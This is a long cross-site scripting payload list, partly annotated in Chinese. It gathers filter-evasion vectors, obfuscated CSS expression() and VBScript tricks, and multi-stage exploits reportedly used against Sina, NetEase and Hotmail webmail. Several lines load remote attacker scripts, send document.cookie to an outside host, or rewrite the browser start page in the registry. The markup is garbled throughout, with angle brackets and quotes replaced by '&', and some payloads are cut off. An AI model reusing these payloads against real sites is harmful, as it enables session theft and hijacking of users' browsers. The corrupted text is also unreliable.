&textarea autofocus onfocus=alert(1)&
&keygen autofocus onfocus=alert(1)&
&img src=1 language=vbs onerror=msgbox+1&
&img src=1 language=vbscript onerror=msgbox+1&
&img src=1 onerror=vbs:msgbox+1&
&b/alt=&1&onmouseover=InputBox+1 language=vbs&test&/b&
&iframe onreadystatechange=alert(1)&
&style onreadystatechange=alert(1)&
&script onreadystatechange=alert(1)&&/script&
&iframe onreadystatechange=alert(1)&&/iframe&
&style onreadystatechange=alert(1)&&/style&
&xml onreadystatechange=alert(1)&
&xml onreadystatechange=alert(1)&test&/xml&
&object type=image src=/565.gif onreadystatechange=alert(1)&&/object&
&img type=image src=/565.gif onreadystatechange=alert(1)&
&image type=image src=/565.gif onreadystatechange=alert(1)&
&input type=image src=/565.gif onreadystatechange=alert(1)&
&isindex type=image src=/565.gif onreadystatechange=alert(1)&
&object data=anything_at_all.pdf&¶m name=src value=&http://p42.us/xss.pdf&&&/param&&/object&
&img src=&x onerror=alert(1)//[^&]* &&
&a href='data:text/xml,&?xml version=&1.0& encoding=&UTF-8&?&&!DOCTYPE html [ &!ENTITY inject &<script>alert(1)</script>&&]&&html xmlns=&http://www.w3.org/1999/xhtml&&&&/html&'&haha&/a&
This used to work on FF &=3.0&
@import 'data:text/css,* { -moz-binding:url(http://www.businessinfo.co.uk/labs/xbl/xbl.xml#xss) }';
expressions I could go on all night :)
&div style=&xss:exp\00ression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\73:\70\73\6f\006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\ \0073: \ \ \ \ \006f \006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&xss:\078\\\\e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&xs\0s:e\x\pression\(window.x?0:(alert(/XSS/),window.x=1)\);&&&/div&
&div style=&\73:\;\;\;\;\;\;\;\;\006fe(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\73>:\0065\0078\0070\0072\0065\0073\0073\0069\006f\006e(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
&div style=&\8\3s:e\xp/*tbeorhf*/ression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
Encoded comments:-
&div style=&xss:ex/*OMG*/pression(window.x?0:(alert(/XSS/),window.x=1));&&&/div&
The VB example doesn't require () :-
&IMG SRC=a onerror='vbscript:msgbox&XSS&'&
And how about vbs:&
&img src=1 onerror=&vbs:MsgBox 1&&
&?xml version=&1.0& encoding=&utf-7&?&+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-&
&ſcript&
&SCRIPT SRC=http://ha.ckers.org/xss.js&&/SCRIPT&
&IMG SRC=&javascript:alert('XSS');&&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=JaVaScRiPt:alert('XSS')&
&IMG SRC=javascript:alert(&XSS&)&
&IMG SRC=`javascript:alert(&RSnake says, 'XSS'&)`&
&IMG &&&&&SCRIPT&alert(&XSS&)&/SCRIPT&&&
&IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=		)&
&IMG SRC=javascript:alert('XSS')&
&IMG SRC=&jav ascript:alert('XSS');&&
&IMG SRC=&jav	ascript:alert('XSS');&&
&IMG SRC=&jav
ascript:alert('XSS');&&
&IMG SRC=&jav
ascript:alert('XSS');&&
&IMG SRC=&  &javascript:alert('XSS');&&
&SCRIPT/XSS SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(&XSS&)&
&SCRIPT/SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&&SCRIPT&alert(&XSS&);//&&/SCRIPT&
&SCRIPT SRC=http://ha.ckers.org/xss.js?&B&
&SCRIPT SRC=//ha.ckers.org/.j&
&IMG SRC=&javascript:alert('XSS')&
&iframe src=http://ha.ckers.org/scriptlet.html &
&SCRIPT&a=/XSS/
alert(a.source)&/SCRIPT&
\&;alert('XSS');//
&/TITLE&&SCRIPT&alert(&XSS&);&/SCRIPT&
&INPUT TYPE=&IMAGE& SRC=&javascript:alert('XSS');&&
&BODY BACKGROUND=&javascript:alert('XSS')&&
&BODY ONLOAD=alert('XSS')&
&IMG DYNSRC=&javascript:alert('XSS')&&
&IMG LOWSRC=&javascript:alert('XSS')&&
&BGSOUND SRC=&javascript:alert('XSS');&&
&BR SIZE=&&{alert('XSS')}&&
&LAYER SRC=&http://ha.ckers.org/scriptlet.html&&&/LAYER&
&LINK REL=&stylesheet& HREF=&javascript:alert('XSS');&&
&LINK REL=&stylesheet& HREF=&http://ha.ckers.org/xss.css&&
&STYLE&@import'http://ha.ckers.org/xss.css';&/STYLE&
&META HTTP-EQUIV=&Link& Content=&&http://ha.ckers.org/xss.css&; REL=stylesheet&&
&STYLE&BODY{-moz-binding:url(&http://ha.ckers.org/xssmoz.xml#xss&)}&/STYLE&
&XSS STYLE=&behavior: url(xss.htc);&&
&STYLE&li {list-style-image: url(&javascript:alert('XSS')&);}&/STYLE&&UL&&LI&XSS
&IMG SRC='vbscript:msgbox(&XSS&)'&
&IMG SRC=&mocha:[code]&&
&IMG SRC=&livescript:[code]&&
?script?alert(¢XSS¢)?/script?
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=javascript:alert('XSS');&&
&META HTTP-EQUIV=&refresh& CONTENT=&0;url=data:text/base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&&
&META HTTP-EQUIV=&refresh& CONTENT=&0; URL=http://;URL=javascript:alert('XSS');&&
&IFRAME SRC=&javascript:alert('XSS');&&&/IFRAME&
&FRAMESET&&FRAME SRC=&javascript:alert('XSS');&&&/FRAMESET&
&TABLE BACKGROUND=&javascript:alert('XSS')&&
&TABLE&&TD BACKGROUND=&javascript:alert('XSS')&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&
&DIV STYLE=&background-image:\6C\6a\61\72\74\003a\65\28.53\29'\0029&&
&DIV STYLE=&background-image: url(javascript:alert('XSS'))&&
&DIV STYLE=&width: expression(alert('XSS'));&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS&)';&/STYLE&
&IMG STYLE=&xss:expr/*XSS*/ession(alert('XSS'))&&
&XSS STYLE=&xss:expression(alert('XSS'))&&
exp/*&A STYLE='no\xss:noxss(&*//*&);
xss:ex/*XSS*//*/*/pression(alert(&XSS&))'&
&STYLE TYPE=&text/javascript&&alert('XSS');&/STYLE&
&STYLE&.XSS{background-image:url(&javascript:alert('XSS')&);}&/STYLE&&A CLASS=XSS&&/A&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert('XSS')&)}&/STYLE&
&!--[if gte IE 4]&
&SCRIPT&alert('XSS');&/SCRIPT&
&![endif]--&
&BASE HREF=&javascript:alert('XSS');//&&
&OBJECT TYPE=&text/x-scriptlet& DATA=&http://ha.ckers.org/scriptlet.html&&&/OBJECT&
&OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-&¶m name=url value=javascript:alert('XSS')&&/OBJECT&
----------------------------------------------------------------------------------------------
&EMBED SRC=&http://ha.ckers.org/xss.swf& AllowScriptAccess=&always&&&/EMBED&
----------------------------------------------------------------------------------------------
&EMBED SRC=&data:image/svg+base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDA3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==& type=&image/svg+xml& AllowScriptAccess=&always&&&/EMBED&
----------------------------------------------------------------------------------------------
b=&URL(\&&;
c=&javascript:&;
d=&alert('XSS');\&)&;
eval(a+b+c+d);
----------------------------------------------------------------------------------------------
&HTML xmlns:xss&
& &?import namespace=&xss& implementation=&http://ha.ckers.org/xss.htc&&
& &xss:xss&XSS&/xss:xss&
&XML ID=I&&X&&C&&![CDATA[&IMG SRC=&javas]]&&![CDATA[cript:alert('XSS');&&]]&
&/C&&/X&&/xml&&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&
&XML ID=&xss&&&I&&B&&IMG SRC=&javas&!-- --&cript:alert('XSS')&&&/B&&/I&&/XML&
&SPAN DATASRC=&#xss& DATAFLD=&B& DATAFORMATAS=&HTML&&&/SPAN&
&XML SRC=&xsstest.xml& ID=I&&/XML&
&SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&&/SPAN&
----------------------------------------------------------------------------------------------
&HTML&&BODY&
&?xml:namespace prefix=&t& ns=&urn:schemas-microsoft-com:time&&
&?import namespace=&t& implementation=&#default#time2&&
&t:set attributeName=&innerHTML& to=&XSS&SCRIPT DEFER&alert(&XSS&)&/SCRIPT&&&
&/BODY&&/HTML&
----------------------------------------------------------------------------------------------
&SCRIPT SRC=/420.jpg&&&/SCRIPT&
&!--#exec cmd=&/bin/echo '&SCR'&--&&!--#exec cmd=&/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&&/SCRIPT&'&--&
&? echo('&SCR)';
echo('IPT&alert(&XSS&)&/SCRIPT&'); ?&
&IMG SRC=&/somecommand.php?somevariables=maliciouscode&&
Redirect 302 /a.jpg /admin.asp&deleteuser
&META HTTP-EQUIV=&Set-Cookie& Content=&USERID=&SCRIPT&alert('XSS')&/SCRIPT&&&
&HEAD&&META HTTP-EQUIV=&CONTENT-TYPE& CONTENT=&text/ charset=UTF-7&& &/HEAD&+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
----------------------------------------------------------------------------------------------
&SCRIPT a=&&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT =&&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=&&& '' SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT &a='&'& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=`&` SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT a=&&'&& SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
&SCRIPT&document.write(&&SCRI&);&/SCRIPT&PT SRC=&http://ha.ckers.org/xss.js&&&/SCRIPT&
----------------------------------------------------------------------------------------------
&A HREF=&http://66.102.7.147/&&XSS&/A&
&A HREF=&http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&&XSS&/A&
&A HREF=&http:///&&XSS&/A&
&A HREF=&http://0x42.0xx7.0x93/&&XSS&/A&
&A HREF=&http://07./&&XSS&/A&
&A HREF=&h
tt p://6	6.x7.147/&&XSS&/A&
&A HREF=&///&&XSS&/A&
&A HREF=&//google&&XSS&/A&
&A HREF=&http://ha.ckers.org@google&&XSS&/A&
&A HREF=&http://google:ha.ckers.org&&XSS&/A&
&A HREF=&/&&XSS&/A&
&A HREF=&./&&XSS&/A&
&A HREF=&javascript:document.location='/'&&XSS&/A&
&A HREF=&http://www.go//&&XSS&/A&}
&script&alert(&dddd&)&script&
&script&alert('test')&/script&
----------------------------TOM-------------------------------------------------------------------
&img src=/854.gif& width=0 height=0 ononloadload=&alert(52)&&52
&img src=/854.gif& width=0 height=0 onload=&alert(53)&&53
&img src=/854.gif& width=0 height=0 /**/onload=&alert(54)&&54
&ba=&&script&alert(55);&/script&&55
&img/*****/src=# width=0 height=0 /***/onerror=alert(56)&56
&iframe/**/src=&57&/iframe&
&img src=/146.gif onreadystatechange=alert(58)&58
&image src=/146.gif onreadystatechange=alert(59)&59
&style onreadystatechange=alert(60)&60&/style&
&xml onreadystatechange=alert(61)&xxxx&/xml&61
&object type=image src=/146.gif onreadystatechange=alert(62)&62
&img type=image src=/146.gif onreadystatechange=alert(63)&63
&P STYLE=&behavior:url('#default#time2')& onEnd=alert(64)&64
&P STYLE=&behavior:url('#default#time2')& onBegin=alert(65)&65
&style&&img src=&&/style&&img src=x onerror=alert(66)//&&66
----------------------------------------------------------------------------------------------
&DIV STYLE=&background-image:\6C\61\73\69\3A\65\28\002F\73\002F\&&
&frameset onload=alert(1)&
&IMG SRC=&jav ascript:alert('XSS-1');&&
&IMG &&&&&SCRIPT&alert(&XSS-2&)&/SCRIPT&&&
Hello,80sec &&/xss style=&x:expression(alert(document.cookie))&&
&img src=/989.gif onLoad=alert(/xss-3/);&
&img src=&javascript:alert(/xss-4/)& width=100&
&img src=&#& style=&Xss:expression(alert(/xss-5/));&&
input {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
&/style& &
&input type=&text&&
a {;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(alert(/xxx/))
&marquee style=&background-color:red& onstart=&alert('monyer')& &asdf&/marquee&
&div&\n&marquee style=\&BACKGROUND-COLOR:\& onstart=&alert('monyer')&\n&asdf&\/marquee&&\/div&
&img src=&marquee style=&background-color:red& onstart=&alert('monyer')& &onerror=alert(/XSS-6/)&&&/marquee&
&img src=&marquee style=&background-color:red& onstart=&alert('monyer')& &onerror=onerror=alert(/XSS-7/)&&&marquee&
&img src=&marquee style=&background-color:red& onstart=&alert(/&/&) &onerror=onerror=alert(/XSS-8/)&&&marquee&&
这个新浪只差一个&闭合了
&img src=&&marquee style=&background-color:red& onstart=&alert(&(&) &onerror=onerror=alert(/XSS-9/)&&&marquee&
&img src=& http://xss.jpg&&&; onerror=alert('onerror=')&
这个新浪不让加入
&img src=& http://xss.jpg& onerror=alert('onerror=')&
&img src=& http://xss.jpg& style=\&BACKGROUND-COLOR:\& onerror=alert('onerror=')&
&DIV style=&xss:ex/*ss*/pression(alert('/ycosxhack'))&&&/DIV&
&img src=& http://xss.jpg& onerror=alert('XSS-10')&
&IMG onerror=&alert('XSS-11')& src=& http://xss.jpg&&
&img src=http onerror=alert(/XSS-12/)&
&div style=&background-color:red& onmouseenter=&alert('monyer')&&123456&/div&
&HTML&&HEAD&
&P&参加&/P&
&div id=&nini& style=&display:none&&window.xx=2;var f=document.createElement('script');f.src='http://www./test.js'.replace(/!/g,String.fromCharCode(38));document.getElementsByTagName('head')[0].appendChild(f)&/div&&style&&!--a{font-size:14font-family:arial,verdana,sans-&/style&&div&;a:e/*t*/x/*y*/p/*m*/r/*k*/e/*l*/s/*p*/s/*h*/i/*p*/o/*f*/n(window.xx!=2?eval(nini.innerHTML):1);&/div&&style&}--&&/style&&a&&/a&&img width=&1& height=&1& src=&http://www./test.js&&
&/BODY&&/HTML&
网易最新的xss
&script defer=&defer&&var a,b,c,d,e;a=&http:&;b=&//&;c=&www&;d=&.baidu&;e=&.com&;window.open(a+b+c+d+e,&&,&toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=500,height=500&);&/script&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&behavior:url(#default#time2)& attributename=innerhtml values=&img/src=`.`style=`display:none`onerror=eval(llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&behavior:url(#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*/XMLNS:t=&urn:schemas-microsoft-com:time&&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`display:none`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*/XMLNS:t/*t*/=/*t*/&urn:schemas-microsoft-com:time&/*t*/&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`./*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div id=&aaa& style=&display:none&&&/div&
&div id=&llyy& style=&display:none&&
if(parent.window.x!='1')
var script1 = parent.document.createElement('script');
script1.id='script1';
script1.src='http://www./test.js';
parent.document.body.appendChild(script1);
&HTML /*t*///fuckyou///\/XMLNS:t/*t*/=/*t*/&urn:schemas-microsoft-com:time&/*t*/&
&div&1&t:animate style=&/*t*/behavior/*t*/:/*t*/url(/*t*/#default#time2)& /*t*/attributename=innerhtml values=&img/src=`onerror.eval\/\/\/\/\/\/\/\/\/\/\/\\/\/\/\/\////////////////////*t*//*t*//*t*//*t*//*t*/`style=`/*t*/display:none/*t*/`/*t*/onerror=/*t*/eval/*t*/(/*t*/llyy.innerHTML)&&&/div&
&div style=width:1filter:glow onfilterchange=alert(1)&x
&!--&img src=&--&&img src=x onerror=alert(1)//&&
&comment&&img src=&&/comment&&img src=x onerror=alert(1)//&&
&style&&img src=&&/style&&img src=x onerror=alert(1)//&&
&x '=&foo&&&x foo='&&img src=x onerror=alert(1)//'&
&a href=&javascript#[code]&&
&img src=&javascript:[code]&&
&img tdynsrc=&[code]&& [IE]
&input type=&imge& dynsrc=&[code]&& [IE浏览器]
&bagsound src=&[code]&& [IE浏览器]
&&script&[code]&/script&
&{[code]} [N4浏览器]
&img src=&{[code]};&
&link rel=&stylesheet& herf=&[code]&&
&iframe src=&vbscript:[code]&& [IE浏览器]
&img src=&mocha:[code]&& [N4浏览器]
&img src=&livescript:[code]&& [N4浏览器]
&div style=&behaviour:url([link to code])&& [IE浏览器]
&div style=&binding:url([link to code])&& [Mozilla浏览器]
&div style=&width:expression([code]);&& [IE浏览器]
&object classid=&clsid:...& codebase=&javascript:[code]&& [IE浏览器]
[\xCO][\xBC]script&[code][\xCO][\xBC]/script& [UTF-8;IE;Opera浏览器]
& &&a href=&javascript#[code]&&
& &&div onmouver=&[code]&&
& &&img src=&javascript:[code]&&
& &&img dynsrc=&javascript:[code]&& [IE]
& &&input type=&image& dynsrc=&javascript:[code]&& [IE]
& &&bgsound src=&javascript:[code]&& [IE]
& &&&script&[code]&/script&
& &&{[code]}; [N4]
& &&img src=&{[code]};& [N4]
& &&link rel=&stylesheet& href=&javascript:[code]&&
& &&iframe src=&vbscript:[code]&& [IE]
& &&img src=&mocha:[code]&& [N4]
& &&img src=&livescript:[code]&& [N4]
& &&a href=&about:&script&[code]&/script&&&
& &&meta http-equiv=&refresh& content=&0;url=javascript:[code]&&
& &&body onload=&[code]&&
& &&div style=&background-image: url(javascript:[code]);&&
& &&div style=&behaviour: url([link to code]);&& [IE]
& &&div style=&binding: url([link to code]);&& [Mozilla]
& &&div style=&width: expression([code]);&& [IE]
& &&style type=&text/javascript&&[code]&/style& [N4]
& &&object classid=&clsid:...& codebase=&javascript:[code]&& [IE]
& &&style&&!--&/style&&script&[code]//--&&/script&
& &&![CDATA[&!--]]&&script&[code]//--&&/script&
& &&!-- -- --&&script&[code]&/script&&!-- -- --&
& &&script&[code]&/script&
& &&img src=&blah&onmouseover=&[code]&&
& &&img src=&blah&& onmouseover=&[code]&&
& &&xml src=&javascript:[code]&&
& &&xml id=&X&&&a&&b&&script&[code]&/script&;&/b&&/a&&/xml&
& &&div datafld=&b& dataformatas=&html& datasrc=&#X&&&/div&
& &[\xC0][\xBC]script&[code][\xC0][\xBC]/script& [UTF-8; IE, Opera]
&IFRAME SRC=&/&&&/IFRAME&
&script&alert('dddd')&script&
&style&*{x:expression(if(x!=1){alert(1);x=1;})}&/style&
&img lowsrc= &javascript:alert('xss-13')&&
img = new Image(); img.src = &http://127.0.0.1/cookie.?cookie=&+document.img.width=0;img.height=0
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-14&)';&/STYLE&
&img src=&#& style=&Xss:expression(alert('xss-15'));&&&
&img src=&javascript:alert(/xss-16/)&&&
&table background=&javascript:alert(/xss-17/)&&&/table&
&img src=&vbscript:msgbox(&a&)&&
&img src=javascript:alert('www.hackm.com')&
&img src=j	ava	script:wi	ndow.op	en('')&
&img src=javascript:document.write('&Iframe%20src=/jc123%20width=500%20height=550%3E&/iframe%3E')&&
&img src=javascript:document.write('%3CIframe%20src=/jc123%20width=500%20height=550%3E%3C/iframe%3E')&
&img src=javascript:document.write('<Iframe%20src=/jc123%20width=500%20height=550%3E</iframe%3E')&
&script&window.location=('/')&/script&
&img src=&/BLOG/javascript:document.write&('&Iframe%20src=%20width=500%20height=550%3E&/iframe%3E')&
&img src=j avascript:document.write('%3CIframe%20src=%20width=500%20height=550%3E%3C/iframe%3E')&
&img src=&/BLOG/&&;#x6Aavascri& #x70t:document.write('& #x3cIframe%20src=%20width=500%20height=550%3E</iframe% 3E')&
&body onload='window.open(&&)'&
&body onload='window.open(&http://baidu.com&)'&
&meta http-equiv=&refresh& content=&0;url=&&
&img dynsrc=javascript:alert(&hi,163&)&
&img dynsrc=javascript:window.location.href='/getcookie.asp?msg='+document.cookie&。
&marquee onstart=&alert(/xss-18/)&&.&/marquee&
前段时间被过滤的hotmail跨站代码
&font color=&ffffff&& &div id=&jmp& style=&display:none&&nop&/div&&div id=&ly& style=&display:none&&function ok(){return true};window.onerror=ok&/div&&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&&div id=&tap& title=&&& style=&display:none&&&/div&&div id=&tep& title=&&& style=&display:none&&&/div&&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&&/font&
&font color=&ffffff&&
&div id=&jmp& style=&display:none&&nop&/div&
&div id=&ly& style=&display:none&&
function ok()
return true
window.onerror=ok&/div&
&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&
&div id=&tap& title=&&& style=&display:none&&&/div&
&div id=&tep& title=&&& style=&display:none&&&/div&
&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&
&STYLE type=text/css&BODY {
BACKGROUND-IMAGE: url(expression:(javascript:alert('xss-19');); ); MARGIN: 0 BACKGROUND-COLOR: #a00000
FONT-SIZE: 12 COLOR: # LINE-HEIGHT: 20px
FONT-SIZE: 12 COLOR: #000000; TEXT-DECORATION: none
FONT-SIZE: 12 COLOR: #ffff00; TEXT-DECORATION: underline
&style&BR{top:rgb('88',80,'180);top:rgb(') !important height:exPrEsSiOn((window.rrr==123)?xxx=8:(eval(code.title)==20088) || (rrr=123))}',80,'180);}&/style&
&div id=&xxx& style=&DISPLAY: none& title=&try{window['on'+'error']=function(){};if(window.ufoufoufo!=1){framedir='http://xxxxx.196/';xyzxyz=document.createElement('SCRIPT');xyzxyz.src=framedir+'yahoo/time.asp?uid=xxxxx';document.getElementsByTagName('head')[0].appendChild(xyzxyz);ufoufoufo=1;}}catch(e){}&&.&/div&&div style=&DISPLAY: none&&&img lang=&HTML& id=&inner& title=&&img onerror=window['eva'+'l'](document.getElementById('xxx').title); src=http://#&& width=0 src=&http://#& style=&background:`url(http:// onerror=this.parentNode[this.id+this.lang]=this.//)`&&&/div&&
&IMG SRC=&javascript:alert(&XSS-20&);&&
&IMG SRC=javascript:alert(&XSS-21&)&
&IMG SRC=&javascript:alert(String.fromCharCode(88,83,83))&&
&IMG SRC=&jav ascript:alert(&XSS-22&);&&
&SCRIPT/XSS SRC=&/xss.js&&&/SCRIPT&
&&SCRIPT&alert(&XSS-23&);//&&/SCRIPT&
&iframe src=/scriptlet.html &
&INPUT TYPE=&IMAGE& SRC=&javascript:alert(&XSS-24&);&&
&INPUT TYPE=&IMAGE& SRC=&javascript:alert('XSS-24');&&
&BODY BACKGROUND=&javascript:alert(&XSS-25&)&&
&BODY ONLOAD=alert(document.cookie)&
&BODY onload!#$%&()*~+-_.,:;?@[/|&]^`=alert(&XSS-26&)&
&IMG DYNSRC=&javascript:alert(&XSS-27&)&&
&IMG DYNSRC=&javascript:alert(&XSS-28&)&&
&BR SIZE=&&{alert(&XSS-29&)}&&
&IMG SRC=&vbscript:msgbox(&XSS-30&)&&
&TABLE BACKGROUND=&javascript:alert(&XSS-31&)&&
&DIV STYLE=&width: expression(alert(&XSS-32&));&&
&DIV STYLE=&background-image: url(javascript:alert(&XSS-33&))&&
&STYLE TYPE=&text/javascript&&alert(&XSS-34&);&/STYLE&
&STYLE type=&text/css&&BODY{background:url(&javascript:alert(&XSS-35&)&)}&/STYLE&
&?=&&SCRIPT&alert(&XSS-36&)&/SCRIPT&&?&
&A HREF=&javascript:document.location=&/&&&XSS&/A&
&IMG SRC=javascript:alert(&XSS-37&)&
&EMBED SRC=&http://ha.ckers.org/xss.swf& AllowScriptAccess=&always&&&/EMBED&
b=&URL(&&&;
c=&javascript:&;
d=&alert(&XSS-38&);&&)&;
eval(a+b+c+d);
&img src=&url.gif& dynsrc=&url.avi&&
&bgsound src=&sound.wav& loop=3&
&img src=&SAMPLE-S.GIF& dynsrc=&SAMPLE-S.AVI& start=mouseover&
&script&window.location=&&&/script&&
&script language=Script&alert(&终于有人上当的了!&)&/script&
&TABLE background=javscript:alert(/xss-39/)&
&iframe src=javascript:alert(/xss-40/)&
&a href=javascript:alert(/xss-41/)&
&DIV STYLE=&background-image: url(javascript:alert('XSS-42'))&&
&DIV STYLE=&width: expression(alert('XSS-43'));&&
&DIV STYLE=&width: exp/*xss*/ression(alert('XSS-44'));&&
&STYLE&@im\port'\ja\vasc\ript:alert(&XSS-45&)';&/STYLE&
&script&open(/*
*/&http://127&/*
*/+&.0.0.1/&/*
*/)&/script&
&script&/*
*/String/*
*/fromCharCode/*
*/111,99,/*
*/......./*
*/&/script&
&script language=&VBScript&&
Set RegWsh = CreateObject(&WScript.Shell&)
RegWsh.RegWrite &HKCU\Software\Microsoft\Internet Explorer\Main\Start Page&, &&&
&a href=&javascript:alert('xss-46');&&Click here&/a&
&form method=&post& action=&javascript:alert('xss-47');&&
&input type=&submit& value=&Submit&&
&img src=&javascript:alert('xss-48');&&&!--只有ie能成功--&
&object type=&text/x-scriptlet& data=&&&&/object&&
&img src=javascript:alert('www.hackm.com')&
&style type=&text/css&&
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
&font color=&ffffff&& &div id=&jmp& style=&display:none&&nop&/div&&div id=&ly& style=&display:none&&function ok(){return true};window.onerror=ok&/div&&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&&div id=&tap& title=&&& style=&display:none&&&/div&&div id=&tep& title=&&& style=&display:none&&&/div&&style&div{background-image:expression(javascript:1?document.write(EC_tip.title+';top:'+EC_tap.title+'/a'+EC_tep.title+EC_tap.title+'script id=nop'+EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+EC_tep.title+EC_tap.title+'script src=/test/index.asp?uid='+EC_tep.title+EC_tap.title+'/script'+EC_tep.title):1=1);}&/style&&/font&
&img src=javascript:document.write('%3CIframe%20src=%20width=500%20height=550%3E%3C/iframe%3E')&
Xsstc { background-image: url('about:blank#Hello%20World'); }&
Xsstc.exec('/test.css', showResponse)
&font color=&ffffff&&&
& & &&div id=&jmp& style=&display:none&&nop&/div&
& & &&div id=&ly& style=&display:none&& & & &//这几个DIV是用来分段存储exp内容的
& & & & &function ok(){return true};
& & & & &window.onerror=ok
& & &&/div&
& & &&div id=&tip& title=&&a style=&display:none&&& style=&display:none&&&/div&
& & &&div id=&tap& title=&&& style=&display:none&&&/div&
& & &&div id=&tep& title=&&& style=&display:none&&&/div&
& & &&style&
&//以下是EXP的开始,一个二元表达式内嵌利用代码。代码把div中存储的内容取出来然后加一起,形成了最终shellcode。
& & & & &div{background-image:expression(
& & & & & & &javascript:1?document.write(
& & & & & & & & & & &EC_tip.title+';top:'+EC_tap.title+'/a'+
& & & & & & & & & & &EC_tep.title+EC_tap.title+'script id=nop'+
& & & & & & & & & & &EC_tep.title+EC_ly.innerHTML+EC_tap.title+'/script'+
